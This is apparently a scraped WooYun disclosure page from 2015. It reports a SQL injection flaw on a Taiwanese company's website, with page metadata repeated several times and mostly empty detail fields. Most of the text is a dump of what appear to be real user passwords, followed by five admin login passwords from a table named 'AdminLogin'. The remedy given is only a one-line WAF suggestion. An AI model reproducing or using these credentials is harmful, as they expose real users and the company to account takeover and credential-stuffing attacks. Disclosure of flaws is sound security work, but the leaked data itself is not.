| gigi1121         |
| gigi1121         |
| gn00028069       |
| gn01883507       |
| gnweghhhf5368    |
| good669447       |
| good8888         |
| gpq6ap37         |
| gt56yhnb         |
| guy57lily@       |
| gw0811           |
| h201869585       |
| han5i011         |
| hank0305         |
| hank962327       |
| hanming1985125   |
| hbl530205        |
| hc016895         |
| heihudie         |
| hjf5028          |
| hn6688           |
| horace           |
| hphp152          |
| hua13064415462   |
| hung66778899     |
| hungshing        |
| i5201314         |
| ibmx60           |
| iii7675          |
| ilifeilife       |
| iloveali0904     |
| iou1223          |
| ivan1207         |
| j12345           |
| j1j2j3j4         |
| j581102          |
| j771024          |
| j771024          |
| j771024          |
| j775721          |
| jack51315088     |
| jd0326           |
| ji31j6ul4xk7     |
| ji394su3         |
| jin801018        |
| jj8182730        |
| jjbojjbo         |
| joejoebaby520    |
| joewyn780707     |
| john497          |
| Js1254           |
| js9523jc         |
| ju1206           |
| ju4421zr         |
| juju555          |
| juryside         |
| k04880520        |
| K08130426        |
| k575557          |
| k6917865         |
| k88888           |
| karen219         |
| kate123          |
| kate123          |
| kate1234         |
| kateaestore      |
| katty1223        |
| kelly8n3706      |
| kenko409         |
| kevin128         |
| KIKILUkikilu2000 |
| kira0204         |
| kiss0616         |
| kitty70828       |
| kk123456         |
| kk1329           |
| kk7891           |
| kkjj5858         |
| kkshop6820561fd  |
| l124660268       |
| l19751002        |
| l222725231       |
| l25222068        |
| l4SrmUD700qlF2U8 |
| l8JIXFwjMW2ll35Z |
| lau88128812      |
| leatherpam       |
| lee5201314       |
| leeahpin801215   |
| leeahpin801215   |
| lgfm3bxjs5       |
| li1312           |
| li13121312       |
| limkok93         |
| lin08061108123   |
| linda666         |
| ljmljxljmljx     |
| LNSTLS2012       |
| lojane224823     |
| longmen2020      |
| lonjohn88        |
| lori@vernice     |
| love0315         |
| love0518         |
| love0620         |
| love131          |
| love5213         |
| love521689       |
| lovekiss         |
| low15471003      |
| lv801129         |
| lyj521125        |
| m08150815        |
| m10188           |
| m134679m         |
| M2209749         |
| macgyver         |
| machi8_1         |
| maggie4628       |
| mandy5439        |
| marc941676       |
| maureen16        |
| may1322          |
| mermaid          |
| meya188          |
| mfkxwy88         |
| mico005161       |
| mikimiki         |
| milch            |
| mill0987         |
| milla9           |
| millet26         |
| milly123         |
| mimi0702         |
| min0039          |
| missyou820407    |
| mnb1984          |
| mnbv             |
| mnbvmnbv         |
| monamona         |
| money1234        |
| moon800210       |
| moorechou        |
| mpp588           |
| ms12070331       |
| mya358           |
| n5103111         |
| ness4823         |
| new123           |
| ng085534         |
| nichemoto        |
| nickjames168     |
| npdwncof2        |
| o2modamarketing  |
| one0718          |
| p5845828         |
| pat30806         |
| pay1314520       |
| pc690120         |
| peggy1217        |
| pig0601          |
| pig988978        |
| polin6688        |
| pP730507         |
| psy5936078       |
| q0418            |
| q121212          |
| q22042204        |
| q9213011         |
| qaz0976155018    |
| qaz0980066066    |
| qaz1793          |
| qaz510551        |
| qazz570129       |
| qooabc741        |
| qoqoqo78         |
| qq661238         |
| qqaazz1204       |
| qqqq1111         |
| qsc1116          |
| qshmmlp78123     |
| qw321123         |
| qwe25262         |
| qwe3040502       |
| qwerty7993042    |
| qwertyuiop30     |
| r0938327607      |
| r1228362         |
| relclage         |
| rex1111          |
| rex888           |
| rMxzwLlaXgavIY0w |
| roger            |
| rorirori0205     |
| s0027745         |
| s0982006981      |
| S9162634         |
| SAM690222        |
| samycf           |
| sasasa           |
| sasasa           |
| seed911          |
| she9149          |
| sherry123        |
| sherrywang       |
| SHINE520         |
| simon1975        |
| sol661106        |
| star8586         |
| steelgoat575     |
| su3g4su3         |
| su5251           |
| super2008        |
| sweet411020      |
| sweet99168888    |
| sweet99168888    |
| t0919881235      |
| t0919881235      |
| t123456          |
| t3272649         |
| ta0730           |
| taitea650719     |
| tale910          |
| talent           |
| tanaka           |
| tcchma0725       |
| tea961687        |
| thjvomn7452      |
| thx123123        |
| tim350           |
| ting47032        |
| tiong123         |
| tk5510343        |
| tmnet123         |
| tontas888        |
| toto8888         |
| tov670829        |
| tsai2511         |
| Ttap0q93rebg3qIZ |
| tw2357738        |
| tynn19910526     |
| u123456          |
| U7M1UJ041w5I93n5 |
| u83mp6           |
| uglyboyman       |
| ukYbf9g8tPKHzvgk |
| V099999          |
| v2619033         |
| vanilla5417      |
| view187aim577    |
| vina8888         |
| vipkhzx001122    |
| vivi5596         |
| vivi680910       |
| w6285578         |
| w7234112         |
| w880412          |
| waimun1981       |
| wally80024       |
| wangqian520      |
| wc6324           |
| wcp9319          |
| wenha0213        |
| william17        |
| win2258          |
| winweien         |
| wlc13812176567   |
| wpHMS2455        |
| wps0106          |
| www520           |
| www520           |
| wyyaini          |
| x71123           |
| xgc2324          |
| xhVSU9VTBLw6W66c |
| xiaomao          |
| xiaoxiang        |
| xo19850225       |
| xy5538           |
| y026689012       |
| y12055           |
| y27781982        |
| yD19Cj4G6zkfk4Q9 |
| yesokay0912      |
| yhpuio371363636  |
| yjo494g4su3      |
| young2828        |
| yu27185555*      |
| yukachris        |
| yung1211         |
| z0147896325      |
| z19871120        |
| z2243856         |
| z22887149Z       |
| ziyou19731014    |
| zr19761217       |
| zx!@CV34         |
| zx690328         |
| zxc6820613       |
| zxc930323        |
| zxcvasdf         |
| zxcvb            |
| zzz888           |
+------------------+
Database: AE_aeweb
Table: AdminLogin
[5 entries]
+-------------+
| password    |
+-------------+
| 38391018    |
| answer12345 |
| answer1357  |
| lg456789    |
| su3g4su3    |
+-------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-12-05 20:08

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157755

漏洞标题：安翌全球網路股份有限公司主站存在SQL注射漏洞（大量用户明文密码泄露）（臺灣地區）

相关厂商：安翌全球網路股份有限公司

漏洞作者：路人甲

提交时间：2015-12-03 11:37

修复时间：2016-01-19 20:10

公开时间：2016-01-19 20:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157755

漏洞标题：安翌全球網路股份有限公司主站存在SQL注射漏洞（大量用户明文密码泄露）（臺灣地區）

相关厂商：安翌全球網路股份有限公司

漏洞作者： 路人甲

提交时间：2015-12-03 11:37

修复时间：2016-01-19 20:10

公开时间：2016-01-19 20:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0157755"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云